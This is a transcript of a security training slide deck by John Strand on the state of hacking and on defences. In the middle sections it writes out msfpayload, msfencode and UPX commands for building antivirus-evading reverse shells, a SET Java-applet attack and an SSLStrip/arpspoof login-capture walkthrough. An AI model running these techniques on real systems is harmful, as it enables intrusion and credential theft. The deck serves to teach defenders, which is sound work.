if i wake up evil... john strand sans black hills information security
Post on 01-Apr-2015
233 Views
Preview:
TRANSCRIPT
If I wake up evil...John Strand
SANSBlack Hills Information Security
State of the Hack(Why We are Losing)
• The attackers have a clear advantage on uso They don't play by any ruleso We do...o They have a well defined structure for learningo Little to no attribution
• Many think that compliance equals securityo This is not trueo Compliance with regulations is a guidelineo They are a series of objectives
• Many times we don't have time to "know" our networks and systems
Malware Example:Conficker
• Devastating worm that infected over 15 million computers
• Infection through MS08-067, file shares and removable mediao Microsoft disabled autorun in response to this
worm• Highly effective defenses
o Tries to kill AV every secondo Blocks certain DNS lookupso Disables Auto updateo Disables Safe-mode
• Updates itself• Uses crypto
State Of The Hack:Sony
• 100 Million accounts compromised• Shut down their network for 23 days• $171 million in lost revenue and costs• By the way, there were multiple Sony hacks this quarter• Cross analysis between 1 million Sony passwords and
250K Gawker passwords revealed that many people reuse passwords– http://www.theregister.co.uk/2011/06/08/
password_re_use_survey/• Also, many people use password complexity exactly like
we have trained them– And it still does not work
State Of The Hack:Bank Of America
• “Hundreds” of accounts compromised– But in this case size does not matter
• The accounts we targeted “high value” targets• The attack was launched by an insider• Overly elaborate attack
– Ordered new checks, forwarded phone calls and arranged for the check pickup
– The attackers were unaware of automatic bill-pay...?• 10 million dollars stolen• How do we defend against an insider?
State of the Hack RSA
• About the RSA attack..– It might be worse than we thought, and we thought it was bad
• Attacks against LMCO, L-3 and possibly Northrup Grumman
• SecureID’s generate a “random” pin every 60 seconds• This pin is based on a random seed file that is shared byt
the server and to token• If you obtain the seed file from the server (.ASC or .XML)
you can clone the pin on the fob• What if RSA was storing PINs for its customers?• What if those PINS were compromised• Unfortunately, we don’t know a whole lot
Wait, what?
Hi John,
Company X is asked every day if Product X could have stopped the latest du jour threat that is bypassing traditional blacklisting-based antivirus.
On June 26th, 2010, we showed how Product X beat down Stuxnet. On August 26th, Product X beat down DLL Hijacking attempts. The threats keep coming, so which ones should we beat down next?
How did it Infect?
• USB… Yep, plain old USB• The easiest way to bypass the firewall, IDS and IPS• There were a number of 0-days
– .lnk file vulnerability– Print Spooler (CVE-2010-2729)– Win32 Keyboard Layout Vulnerability– Privilege escalation via Task Schedule
• There has been some misinformation about the Task Scheduler vulnerability from some AV vendors– You do not need to be in the local administrators group
• It also used some older exploits like 08-067 – Conficker anyone?
On to the Details
• Remember the Windows baseline section of 464?– tasklist /m– tasklist /m s7otbxdx.dll
• Stuxnet used dll replacement to insert execution redirection
• In fact, it moved s7otbxdx.dll to s7otbxsx.dll inserted its own s7otbxdx.dll – This is important because it means the attackers had an
understanding of the original code– 93 of the original 109 exports are forwarded to the
renamed s7otbxsx.dll – The remaining 16 get us excited
How did it Communicate?
• Once it infects a system it tries to connect to two sites to verify connectivity:– www.mypremierfutbol.com– www.todaysfutbol.com– Clearly not targeting a US audience….
• P2P Communication• C2 servers in Malaysia and Denmark
– Checking Versions• It also uses peer-to-peer communication• Remember what we covered in the network lab?
– Yeah, it tried to spread via shares– Watch that system-to-system communication
• Watch for PLC systems connecting to the Internet
Clouds.... Evil Clouds.
What is Cloud Computing?
• I had to look it up– I hear about it a lot, but I don’t have a clear concept
of what it is• Straight to the Wiki!
– “Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.”
• I get it… It is like a Bot-Net!
• Based on Vendor Information it looks like it is going to make me irrelevant
But What is it?
• “It is a paradigm shift..” Oh oh… This is going to be good.
• It is a paradigm shift following the mainframe and client-server shifts
that preceded it. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them.[1] Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically
scalable and often virtualized resources as a service over the Internet.[2][3] It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.[4]
• The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network [5], and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents.[6] Typical cloud computing providers deliver common business applications online which are accessed from a web browser, while the software and data are stored on servers.
I Am Letting Wikipedia Write All of My Presentations!
• Security could improve due to centralization of data[35], increased security-focused resources, etc., but concerns can persist about loss of control over certain sensitive data, and the lack of security for stored kernels[36]. Security is often as good as or better than under traditional systems, in part because providers are able to devote resources to solving security issues that many customers cannot afford.[37] Providers typically log accesses, but accessing the audit logs themselves can be difficult or impossible. Furthermore, the complexity of security is greatly increased when data is distributed over a wider area and / or number of devices.
Looking Forward To Unemployment?
But Wait!!!Did they say “Internet”
• “The term cloud is used as a metaphor for the Internet.”
• But the Internet is Evil!!– How can this be so?
Lets set the stage..
• We have to know who it is we are working with
• Who are the people we are defending?• Who is attacking?
– What are their capabilities?– What are their means?
• What are the tools we have to defend ourselves?
• Who is on our side?
Your Users
• They are trying to go places they shouldn’t• Security is not a major concern
– They never get into trouble• “It was just a pop-up!”
– They “think” they know what it would look like if they were attacked.
• No skull and crossbones? Good to go!
• You “think” they are “stupid”• Are they?
Granny Max
• Loves to gamble• Likes Polka Dots• Likes anything with
“Polka” in it• Thinks the CD tray is a
coaster• Collects Gnomes• Bypasses your outbound
web filters buy using a third party anonymizing proxy
Phil… From Accounting
• Works with numbers…
• ... and Terabytes of Porn!
• Has a “slight” problem
• Does not get along with Granny Max
• Hates cats• Bypasses your
filtering by using a SSH tunnel through his home system
The “Average” Users
• Do not gamble…– … at work
• Do not surf porn…– ….at work
• Likes: Facebook, YouTube, Politics, eBay, Googling, Fantasy football, Fark, Drudge Report, the Huffington Post, CNN, Amazon
• Dislikes: Web filters• Quickly becoming friends
with Phil and Gran Max to learn ways to bypass your filtering
The Bad Guys
• Motivated– Can you imagine their
HR department?• Wicked skilled (more
on this later)• They either own or
infect many of the sites your more “interesting” users are going to
The Bobs
The Cloud
• The Internet is big…• … really big• You just won't believe
how vastly hugely mindboggingly big it is...
• Most of it is worthless.. and Evil!
• Many of your users will not stop clicking until they visit every site
Lets Compromise An Account
Bypassing AV
• "But Anti-Virus software will protect us... Right?"
• Anti-Virus, like all software, has its limitations• Do not believe for one second that it is the
ultimate protection• It works great for detecting and removing
known malware• That means someone was infected before you• Many dedicated and targeted attackers are not
concerned about anti virus software• But why?
How Would an Attacker Bypass AV?
– There are a variety of ways– But remember the goal is to create a "new"
signature– Attackers can use packers to "pack" the malicious
code• This creates a self-extracting and executing file• In the process of packing the executable is scrambled• Functions may not be where AV expects them to be
– Attackers can also use tools to "encode" the executable
• This has been around for a long time in tools like ADMutate and PEScramble
• One technique these tools use is to add a large number of "jumps" to the code making it difficult to reverse
No Tricks
• Let's say an attacker wanted to create an executable that created a reverse connecting, memory based rootkit
• Straight msfpayload to an exe• ./msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8081 X > PlainMetrev_8081.exe
Not Too Bad..
But Wait!!!
Thank You Panda…
Add a Bit of UPX..
• Attackers can use compression as a means to bypass AV products
• One product that attackers often use is the Ultimate Packer and Unpacker for Executables (UPX)
• upx -2 -f -o PlainMetRevUPX.exe PlainMetRev.exeo This will create an executable that is compressed
with a setting of 2o The settings go from 1 to 9 o The higher the level the greater the compressiono 2 works very well for bypassing AV
Cut in Half?
What if We Used the Browser for Communication?
• ./msfpayload windows/shell/reverse_http LHOST=192.168.1.1 LPORT=9091 X > PlainShellRevHttp_8081.exe
• This is slightly different than the previous example
• This is a shell that makes a reverse HTTP connection
Down to Only 17.95%
What if We Try a Reverse http Shell with Encoding?
• ./msfpayload windows/shell/reverse_http LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' " -t exe -o EncShellRevHttp.exe
• We are now using encoding on the executable• This means the executable will be different every
time it is created• The default encoder with the Metasploit framework
is "Shikata ga nai"• This means "There is nothing that can be done
about it" in Japanese
Race to 0
Bypassing IDS
• There are a variety of ways to bypass AV• But what about IDS?• Turns out many IDS products have the same
"signature-based" problem• Some claim to be "heuristic"• We can fragment our attacks
o Separate the attack across multiple packets• We can encode the attacks
o Into Base 64o Unicodeo Hex
Bypassing IDS:Uncreative, Yet, Effective Ways
– Why not have the victim system connect to us!• We bypass many firewall and IDS/IPS restrictions• We can make it look like standard web traffic
– We could have our attacks go over Secure Sockets Layer
• Many organizations are using SSL to protect their traffic in transit
• However, it often blinds them to attacks against their web servers
• Attackers can try Cross Site Scripting, SQL Injection and Command injection all day long
– Remember just because there is a lock it does not mean it is "secure"
Blending with Normal Processes
• One of the easiest ways for an attacker to hide or even attack your systems is to "blend-in"
• Many people think that an attacker will only use exploits to "spread" through your networko This is not true
• Rather, they will utilize built-in services and commands to compromise additional systemso SSH or RDP with accounts and passwords from the first
system compromised• This will not be caught by your IDS because it is
"normal" traffic
Exploit Demo
Java as a Payload
• Java is an excellent payload option– Installed pretty much everywhere– Users are accustomed to clicking “Run” for Java apps
• SET has the ability to take a Metasploit payload and export it to a .jar file
• In this example we will be taking the default SET web page and inserting a .jar file into it
• When a user connects to our site the java app will load
• Shell will ensue
Its what's for breakfast.
Starting SET
Nice ASCII Art!
SETting Options
Hack By Numbers!
Please select Option Number 2
SET Website Attack Vectors
The Option We Will Be
Using
Very Effective
If You Know HTML
Import your own website is even more effective if you are
not particularly good at HTML
Choosing Java as Our Payload
Can be flaky
Setting the Payload Type
• Meterpreter and VNC payloads are nice- However, they can be unstable
• Shell Reverse_TCP tends to be the most stable in testing
• Knowing if your target is running 64 bit can be a big help
Please Select Option 1 for 32 Bit
Or, 6 for Windows 64 Bit Systems
Setting the Encoder
We Are Going to Use
shikata_ga_nai
We Will Encode Twice
Linux and OS X Payloads
Please Choose “no”
Metasploit Starting
Payload in Waiting
Reverse Payload Listening on 4444
Because Cows are Cool
Browsing to Your Site
Everyone Clicks “Run”
http://[Your Linux IP]
Got Shell?
• Yes!!!• Now you can wield your Windows Command-
line Kung-fu!
Interacting with Our Shell
Time to do the “Happy Dance”
There are other ways...
ISR Evilgrade
• Modular exploit tool to spoof Software Update Responses– "Yes, there IS an update available!"
• Delivers executable of your choosing to the victim• Includes support for multiple vulnerable updaters
– JRE, WinZip, WinAmp, OpenOffice, iTunes, Notepad++ and more
• Relies on MITM from third-party attack– LAN and Ettercap, or remote with DNS manipulation
• Perl-based console interface similar to Cisco IOS– Output and navigation slightly messy
USB Threat Update
• Let’s say you disabled Autorun on all your systems
• Further, let’s say you disable USB mass storage devices
• You can still be compromised by a tin of Altoids• Enter Programmable HID USB Keystroke Dongle• The latest attack vector from IronGeek• He is now trying to find fixes• Implemented S.E.T• Upload any Metasploit Payload
Wireless Device Control“My SSID is P0wned”
• “But we do not have wireless in our network!”– Are you sure?
• One access point can bypass all of your external controls
• “Free Wireless Internet” anyone?• Attackers do not need to find an access point
– They just need to find a client– Karmetasploit is evil
• This also goes for your phone– Do you use GSM?– http://www.shmoocon.org/presentations-
all.html#srsly
Maltego
• By Paterva • Focus is on “extreme” reconnaissance • GUI based display
– I know… I know.. But the GUI rocks• We can pull
– Personal Information– Sites– Additional Email addresses– Friends?– Family?– Intrests
Who is John Strand?
Step 1:Click EmailAddress
Step 2:Click Here
Step 3: Fill In Email
Starting the Transformations
Right clickAnd SelectAll Transforms
It can be a lot of data
Click Yes
What did we find
A friend
What about SSL?
• There are a number of different ways to hijack SSL– See WebMTIM from dsniff
• Unfortunately the user will receive “negative feedback” – Just another way of saying they get a pop-up
box• Most users will click through
– The paranoid ones will not• So how do you hijack the overly paranoid
user?
We can use SSLStrip
• Another great tool from Moxie Marlinspike• This tool strips away SSL from the end user
– Hence the name• The HTTPS will become HTTP
– No negative feedback to the user• The vast number of users will not notice
– Even the very paranoid ones• The 300• We need to use a tool like dsniff to hijack the
traffic and a tool like iptables to redirect the traffic to where sslstrip is waiting
SSLStrip
Get your targets IP and Gateway
SSL Strip
SSLStrip: iptables
SSLStrip: arpspoof
SSLStrip: Got one!
• Now Surf to http://gmail.com and try to log in!
You should see some activity in SSLStrip!!
SSLStrip: Checking the logs
Looks like we got some data!!!
SSLStrip: Looking at the log
SSL Strip: /hackme
Paydirt!!!
Starting over..
Back to Basics…
• Baseline your systems– Processes, DLL’s for Core applications, Users, etc.
• Baseline your network traffic– Why would you allow PLC systems to connect to the
Internet?• Monitor those baselines
– If at all possible, do this hourly• Don’t use shady Russian contractors with
compromised websites• Train everyone, because everyone is a target
– Secure the human• Yes, even you
– Sounds paranoid, I know
Risk and the 20 Critical Controls
Autostart Entry Points
• There are a number of Autostart entry points on your Windows systems
• Run• RunOnce• RunOnceEx
• There are a lot more of these than we can cover in a few slides– Useruinit– Boot.ini
• There needs to be a better way to look at what is going to automatically start on our Windows computers
Sysinternals Autoruns
Find Evil
Red Curtain
Malware Detection on Linux
• Rather than look for specific malware we can also look for indications of compromise
• Rootkit Hunter and chkrootkit do this• They also look for a few specific binaries• Very easy to set up and use• Looks for
– Certain hashes– Wrong File permissions– Hidden Files – Orphaned files
• Why use both tools?
Malwarednsscrap.pl
• Sometimes the best way to know you are compromised is to check your DNS cache
• Not 100%, but nothing is• This script queries your DNS server and sees if
there are any DNS entries that are for “bad” sites• It can automatically pull down a blacklist and do a
compare• However, you can provide your own blacklist• Best used daily (think Nagios)• http://www.mayhemiclabs.com/tools/
malwarednsscraper
Running Malwarescraper.pl
GoodBad
Offensive Countermeasures:Is this allowed?
The Split
• When discussing security we need to be of two separate minds– Offensive– Defensive
• A little lesson on OODA loops– Observe– Orient– Decide – Act
• In our current defensive postures how can we do this
Dynamic BlacklistingWindows
• @echo offfor /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do@for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
• Easy copy and paste link from:– http://pauldotcom.com/wiki/index.php/Episode203
Dynamic BlacklistingLinux
• [root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done
• Easy copy and paste link from:– http://pauldotcom.com/wiki/index.php/Episode204
Portsentry
• Does the same thing we covered in the Blacklisting section
• However, it does offer more flexibility– Logging– Rerouting traffic– Blocking through hosts.deny
• A bit of an older tool (2003) but still surprisingly effective
• Set it up before an audit or a penetration test and make your Linux/Unix systems “go away”
• Still requires a listener (nc) on a honeyport.
Word Web-Bugs
• Very easy to use• Supposed to be used for penetration testing• However this tactic works great at tracking
intellectual property• Not all ways of finding attribution need to result in
shell access• Far less likely to crash a system• Embed this code in a spreadsheet called SSN.xls
and watch how fast an attacker runs the macros
How does it Work?
• It simply inserts a reference to a css or image to a web server
• When the doc is opened it tries to open the URL• Direct connection!
Metasploit De-cloak Engine
• Hunting back where the attackers are coming from• This is done by having the victim/attacker connect
back using a number of applications – Java– iTunes– Word– FTP– Quicktime– DNS
• By having them connect in a number of different ways with different applications we increase the odds of finding their “real” IP address
Running the De-Cloak Engine
Results
Implementing the Decloak Engine
• You can use their servers– Generate a MD5 string based on the attacker/victims
information– Embed an iframe directing them to the decloak site– Recover the information gathered from decloak.net
• You can also implement their API’s on your servers– Implement a custom DNS server– Create a Database for the results– Embed the the Java and Flash applications from
decloak.net
SANS Denver!!!June 25-30
• http://www.sans.org/rocky-mountain-2011/• SANS Security Essentials Bootcamp Style• Management 414: SANS +S™ Training Program for the
CISSP® Certification Exam– ISACA10 = 10% off
• Management 512: SANS Security Leadership Essentials For Managers
• Security 504: Hacker Techniques, Exploits & Incident Handling
• Security 505: Securing Windows• Developer 522: Defending Web Applications Security
Essentials• Forensics 558: Network Forensics
John’s Contact Information
• Strandjs = twitter• www.blackhillsinfosec.com• www.pauldotcom.com• 303-710-1171• 605-550-0724
top related